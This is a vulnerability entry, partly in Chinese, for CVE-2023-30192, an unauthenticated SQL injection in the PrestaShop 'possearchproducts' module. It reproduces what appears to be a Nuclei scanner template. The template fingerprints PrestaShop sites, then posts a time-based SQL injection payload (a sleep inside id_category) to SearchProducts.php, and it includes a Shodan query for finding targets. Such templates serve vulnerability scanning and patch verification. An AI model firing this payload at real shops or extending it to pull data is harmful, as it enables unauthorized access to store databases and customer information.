漏洞描述
In the module “Search Products” (possearchproducts) from PosThemes for PrestaShop, a guest can perform SQL injection in affected versions.
CVE-2023-30192: PrestaShop 'possearchproducts' <= 1.7 - SQL Injection
PoC代码[已公开]
id: CVE-2023-30192
info:
name: PrestaShop 'possearchproducts' <= 1.7 - SQL Injection
author: mastercho
severity: critical
description: |
In the module “Search Products” (possearchproducts) from PosThemes for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-30192
- https://security.friendsofpresta.org/modules/2023/05/11/possearchproducts.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-30192
cwe-id: CWE-89
epss-score: 0.32771
epss-percentile: 0.96677
metadata:
verified: true
max-request: 2
product: possearchproducts
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,prestashop,sqli,time-based-sqli,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(response), "prestashop", "possearchproducts")'
internal: true
- raw:
- |
@timeout: 20s
POST /modules/possearchproducts/SearchProducts.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id_category=10*if(now()=sysdate()%2Csleep(6)%2C0)&id_lang=3&resultsPerPage=10&s=the
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(tolower(response), "products")'
- 'status_code != 404'
condition: and
# digest: 490a0046304402202c8ff7b0f6689f84e7847881fead078b95513b611eb8fe6eb72d29b33f483cd60220026b3866f2360bc529e95267664cd285754b6a2d5547ef331752ab3f561be8f8:922c64590222798bb761d5b6d8e72950